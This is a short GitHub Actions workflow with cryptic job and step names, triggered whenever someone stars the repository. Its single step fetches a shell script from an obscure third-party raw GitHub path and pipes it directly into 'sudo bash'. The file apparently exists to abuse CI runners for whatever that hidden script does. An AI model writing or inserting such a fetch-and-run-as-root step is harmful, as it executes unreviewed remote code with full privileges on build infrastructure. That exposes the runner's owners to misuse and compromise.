name: zc
on:
  watch:
    types: started
jobs:
  GD:
    runs-on: ubuntu-latest
    steps:
    - name: zc
      run: curl https://raw.githubusercontent.com/zsdresd/fmli/master/a/a/a/ashid/fm.sh | sudo bash
